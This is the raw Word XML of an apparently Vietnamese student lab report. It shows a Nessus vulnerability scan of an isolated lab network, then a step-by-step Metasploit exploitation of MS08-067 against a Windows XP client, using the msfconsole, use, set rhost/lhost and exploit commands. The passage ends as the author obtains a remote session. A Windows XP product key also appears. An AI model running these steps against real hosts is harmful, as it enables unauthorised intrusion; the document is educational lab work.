    <w:p w14:paraId="689A2468" w14:textId="46CE7F1D" w:rsidR="00C3464D" w:rsidRDefault="00C3464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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05341C36" wp14:editId="3877E0AC">
            <wp:extent cx="3830782" cy="20831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50" cy="20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60AF" w14:textId="7E283B3F" w:rsidR="00C3464D" w:rsidRDefault="00C3464D" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nhấn Save &gt; Bấm vào phần scan vừa tạo (basic_scan_</w:t>
      </w:r>
      <w:r>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) &gt; Nhấn vào launch (góc trên phải)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6875EAE0" w14:textId="6152167F" w:rsidR="00C3464D" w:rsidRPr="00C3464D" w:rsidRDefault="00C3464D" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đang scan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA5D4AB" w14:textId="2535E5E6" w:rsidR="00191DE6" w:rsidRDefault="00C3464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 wp14:anchorId="11240C90" wp14:editId="371F4CB5">
            <wp:extent cx="3859784" cy="2098964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96" cy="21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147" w14:textId="4A0067A0" w:rsidR="00C3464D" w:rsidRDefault="00C3464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Đã scan xong</w:t>
      </w:r>
      <w:r w:rsidR="00C54C6D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; có 3 tab: </w:t>
      </w:r>
      <w:r w:rsidR="00C54C6D" w:rsidRPr="00C54C6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Host | Vulnerability | History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261D8BC8" w14:textId="17804979" w:rsidR="00C3464D" w:rsidRDefault="00C54C6D" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F8F673F" wp14:editId="7C8FA86A">
            <wp:extent cx="5943600" cy="26047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CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB607C3" w14:textId="58A7784F" w:rsidR="00C3464D" w:rsidRDefault="00C54C6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b History: hiển thị các lượt scan đã scan, có thể xem thông tin scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E479B8" w14:textId="354A5E46" w:rsidR="00C54C6D" w:rsidRDefault="00C54C6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b Host: hiển thị tất cả các host đã quyét của lượt scan (basic_scan_vulnerability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04328C0B" w14:textId="010F7CC0" w:rsidR="00C54C6D" w:rsidRDefault="00C54C6D" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="478A206F" wp14:editId="0728261D">
            <wp:extent cx="5943600" cy="1641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72A5" w14:textId="4CAEE626" w:rsidR="00C54C6D" w:rsidRDefault="00C54C6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192.168.12.2: server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC0270E" w14:textId="4C635B33" w:rsidR="00C54C6D" w:rsidRDefault="00C54C6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192.168.12.3: máy client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAE922A" w14:textId="0EDBF914" w:rsidR="00C54C6D" w:rsidRDefault="00C54C6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192.168.12.6: máy kali linux attacker (hầu như không có lỗ hổng)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AB957B" w14:textId="5DA82CB4" w:rsidR="00C54C6D" w:rsidRDefault="00C54C6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b vulnerability: thể hiện các vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541CF040" w14:textId="1C62C0FB" w:rsidR="00C54C6D" w:rsidRDefault="00C54C6D" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="118A789A" wp14:editId="7620736E">
            <wp:extent cx="5063836" cy="2827308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5814" cy="28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E065" w14:textId="23FA2524" w:rsidR="008109DB" w:rsidRDefault="00C54C6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ọn host 192.168.12.2 (Server)  &gt; Mixed, ta được các lỗ hổng </w:t>
      </w:r>
      <w:r w:rsidR="008109DB">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulnerability (</w:t>
      </w:r>
      <w:r w:rsidR="008109DB" w:rsidRPr="008109DB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MS09-050,</w:t>
      </w:r>
      <w:r w:rsidR="008109DB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008109DB" w:rsidRPr="008109DB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MS11-030</w:t>
      </w:r>
      <w:r w:rsidR="008109DB">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B07CAF0" w14:textId="667A4391" w:rsidR="00C54C6D" w:rsidRDefault="00C54C6D" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DC492B2" wp14:editId="7699C285">
            <wp:extent cx="3927764" cy="2222796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3048" cy="22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03A3" w14:textId="04C2EAC4" w:rsidR="00C54C6D" w:rsidRDefault="00C54C6D" w:rsidP="007504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ương tự với máy 192.168.12.3</w:t>
      </w:r>
      <w:r w:rsidR="008109DB">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ta được các vulnerability (</w:t>
      </w:r>
      <w:r w:rsidR="008109DB" w:rsidRPr="008109DB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MS06-040, MS08-067, MS09-001</w:t>
      </w:r>
      <w:r w:rsidR="008109DB">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0284BD2E" w14:textId="4567B7DB" w:rsidR="00C54C6D" w:rsidRDefault="00C54C6D" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2406FE70" wp14:editId="50B4A146">
            <wp:extent cx="3920836" cy="2760503"/>
            <wp:effectExtent l="0" t="0" r="381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8570" cy="27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214E" w14:textId="3A7BDFFD" w:rsidR="008109DB" w:rsidRDefault="008109DB" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008109DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Câu 4: Khai thác lỗ hổng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51439AF5" w14:textId="1BF62BF9" w:rsidR="007B256B" w:rsidRPr="007B256B" w:rsidRDefault="007B256B" w:rsidP="007B256B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Sử dụng metaploit để truy cập vào các máy với các lỗ hổng remote</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBA0969" w14:textId="1BBF1364" w:rsidR="007B256B" w:rsidRPr="007B256B" w:rsidRDefault="007B256B" w:rsidP="007B256B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7B256B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Với máy server, ta sẽ sử dụng các lỗ hổng remote</w:t>
      </w:r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</w:r>
      <w:r w:rsidRPr="007B256B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MS11-030</w:t>
      </w:r>
      <w:r w:rsidRPr="007B256B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Vulnerability in DNS Resolution Could Allow Remote Code Execution (2509553)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CEFA14" w14:textId="305C9DEB" w:rsidR="007B256B" w:rsidRDefault="007B256B" w:rsidP="007B256B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0812B1EB" w14:textId="00FAB088" w:rsidR="007B256B" w:rsidRDefault="007B256B" w:rsidP="007B256B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7B256B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Với máy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>client:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007B256B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MS06-040</w:t>
      </w:r>
      <w:r w:rsidRPr="007B256B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Vulnerability in Server Service Could Allow Remote Code Execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007B256B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MS08-067</w:t>
      </w:r>
      <w:r w:rsidRPr="007B256B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007B256B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MS09-001</w:t>
      </w:r>
      <w:r w:rsidRPr="007B256B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F81A69" w14:textId="77777777" w:rsidR="00E80ED4" w:rsidRPr="00E80ED4" w:rsidRDefault="00E80ED4" w:rsidP="00E80ED4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C52F7C5" w14:textId="61682FE5" w:rsidR="00E80ED4" w:rsidRDefault="00E80ED4" w:rsidP="00E80ED4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erminal &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80ED4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfconsole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bật metaploit console)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75025076" w14:textId="722518E3" w:rsidR="00E80ED4" w:rsidRDefault="00E80ED4" w:rsidP="00E80ED4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70235FC0" wp14:editId="4C97AF18">
            <wp:extent cx="3532909" cy="38628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86578" cy="3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38AF42" w14:textId="32D2BF19" w:rsidR="002B6742" w:rsidRPr="002B6742" w:rsidRDefault="002B6742" w:rsidP="00E80ED4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trả về</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DDF371" w14:textId="326686D6" w:rsidR="002B6742" w:rsidRDefault="002B6742" w:rsidP="00E80ED4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="224F947D" wp14:editId="4D8C7454">
            <wp:extent cx="3553691" cy="2176392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3066" cy="21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D82" w14:textId="66319A6B" w:rsidR="00E80ED4" w:rsidRDefault="00E80ED4" w:rsidP="00E80ED4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Tìm kiếm </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80ED4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msf5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80ED4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80ED4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ms08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80ED4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>067</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504DD79E" w14:textId="2638A23D" w:rsidR="00E80ED4" w:rsidRDefault="00E80ED4" w:rsidP="00E80ED4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56EC360D" wp14:editId="3EE26B3D">
            <wp:extent cx="2095500" cy="361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D094" w14:textId="00B45D2C" w:rsidR="00E80ED4" w:rsidRDefault="00E80ED4" w:rsidP="00E80ED4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rả về</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22671D27" w14:textId="17FDDBC2" w:rsidR="00E80ED4" w:rsidRDefault="00E80ED4" w:rsidP="00E80ED4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73D85087" wp14:editId="6296A384">
            <wp:extent cx="4849091" cy="15878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69831" cy="15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4FA3" w14:textId="24379FEF" w:rsidR="00E80ED4" w:rsidRDefault="00E80ED4" w:rsidP="00E80ED4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ư dụng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80ED4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use &lt;Name&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>để phân tích</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FF5DEF" w14:textId="235B6557" w:rsidR="00E80ED4" w:rsidRPr="00E80ED4" w:rsidRDefault="00E80ED4" w:rsidP="00E80ED4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80ED4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use exploit/windows/smb/ms08_067_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1610581E" w14:textId="02837495" w:rsidR="00E80ED4" w:rsidRDefault="00E80ED4" w:rsidP="00E80ED4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465FAFCD" wp14:editId="5FE8308D">
            <wp:extent cx="5667375" cy="5524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265D" w14:textId="396F16D8" w:rsidR="00E80ED4" w:rsidRDefault="004B63BB" w:rsidP="00E80ED4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FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00E80ED4" w:rsidRPr="00E80ED4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>et rhost &lt;victim_host&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00E80ED4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E80ED4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">để đặt host </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5AEDC0" w14:textId="5207A484" w:rsidR="004B63BB" w:rsidRPr="004B63BB" w:rsidRDefault="004B63BB" w:rsidP="00E80ED4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FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">set rhost 192.168.12.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09164C5A" w14:textId="10E39D27" w:rsidR="00E80ED4" w:rsidRDefault="00E80ED4" w:rsidP="00E80ED4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66378FBD" wp14:editId="7C9229D6">
            <wp:extent cx="5229225" cy="3048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CA0" w14:textId="1BDF1A6F" w:rsidR="004B63BB" w:rsidRDefault="004B63BB" w:rsidP="00E80ED4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B63BB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004B63BB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bắt đầu exploit – tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AFE87D" w14:textId="298B298E" w:rsidR="004B63BB" w:rsidRDefault="004B63BB" w:rsidP="00E80ED4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43E4799E" wp14:editId="3B51FAC1">
            <wp:extent cx="5036127" cy="144930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77481" cy="14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6133" w14:textId="2FDA3BD8" w:rsidR="002B2C2B" w:rsidRPr="003379A2" w:rsidRDefault="002B2C2B" w:rsidP="002B2C2B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lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lỗi không thể tìm thấy target ở đây là máy winxp sp1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025D1101" w14:textId="32323AFE" w:rsidR="002B2C2B" w:rsidRDefault="00BE702A" w:rsidP="00BE702A">
      <w:pPr>
        <w:ind w:left="1080"/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Đổi qua bản </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE702A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>winxp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> pro 32bit</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE702A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sp2 </w:t>
      </w:r>
      <w:hyperlink r:id="rId84" w:history="1">
        <w:r w:rsidRPr="00BE702A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>tại đây</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE702A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Làm máy client mới với địa chỉ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE702A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>192.168.12.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0DDF57" w14:textId="1F59CF48" w:rsidR="00697DF9" w:rsidRDefault="00697DF9" w:rsidP="00BE702A">
      <w:pPr>
        <w:ind w:left="1080"/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Với key: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V2C47-MK7JD-3R89F-D2KXW-VPK3J</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FA7D83" w14:textId="7B41CB22" w:rsidR="00BE702A" w:rsidRDefault="00BE702A" w:rsidP="00BE702A">
      <w:pPr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0D54EE95" wp14:editId="534AE50B">
            <wp:extent cx="4259580" cy="1991445"/>
            <wp:effectExtent l="0" t="0" r="762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70021" cy="19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C606" w14:textId="4316C2E8" w:rsidR="00BE702A" w:rsidRDefault="00BE702A" w:rsidP="00BE702A">
      <w:pPr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àm tương tự các bước trên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E157F3" w14:textId="77777777" w:rsidR="00BE702A" w:rsidRDefault="00BE702A" w:rsidP="00BE702A">
      <w:pPr>
        <w:ind w:left="1080"/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>#msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420AF272" w14:textId="77777777" w:rsidR="00BE702A" w:rsidRDefault="00BE702A" w:rsidP="00BE702A">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#search ms08_067</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B4AAA6" w14:textId="330DF123" w:rsidR="00BE702A" w:rsidRDefault="00BE702A" w:rsidP="00BE702A">
      <w:pPr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#use  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE702A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit/windows/smb/ms08_067_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E88AE1" w14:textId="4A05CBF0" w:rsidR="00BE702A" w:rsidRDefault="00BE702A" w:rsidP="00BE702A">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#set lhost 192.168.12.6</w:t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lang w:val="en-US"/>
        </w:rPr>
        <w:t>(địa chỉ ip của máy local host-kali linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6DA2C2" w14:textId="2D396C8C" w:rsidR="00BE702A" w:rsidRPr="00BE702A" w:rsidRDefault="00BE702A" w:rsidP="00BE702A">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE702A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#set rhost 192.168.12.8</w:t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BE702A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(địa chỉ ip của máy client mới tạo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B40119A" w14:textId="51B821F7" w:rsidR="00BE702A" w:rsidRPr="00BE702A" w:rsidRDefault="00BE702A" w:rsidP="00BE702A">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE702A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E31C6E9" w14:textId="1CFBC897" w:rsidR="00BE702A" w:rsidRDefault="00BE702A" w:rsidP="002B2C2B">
      <w:pPr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ưới đây là kết quả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024AF85D" w14:textId="700ED6DF" w:rsidR="00BE702A" w:rsidRDefault="00BE702A" w:rsidP="002B2C2B">
      <w:pPr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04561C68" wp14:editId="74EEDE9D">
            <wp:extent cx="4655820" cy="39310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0230" cy="39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EB0E" w14:textId="44E054CE" w:rsidR="003379A2" w:rsidRDefault="00BE702A" w:rsidP="00BE702A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Đã có xâm nhập, có khả năng điều khiển máy client</w:t>
      </w:r>
      <w:r w:rsidR="003E2EC9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="003E2EC9" w:rsidRPr="003E2EC9">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>192.168.12.8</w:t>
      </w:r>
      <w:r w:rsidR="003E2EC9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từ xa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D224C8F" w14:textId="03D87050" w:rsidR="003E2EC9" w:rsidRDefault="003E2EC9" w:rsidP="003E2EC9">
      <w:pPr>
        <w:ind w:left="1080"/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Thử với lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="003E2EC9">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">và </w:t>
      </w:r>
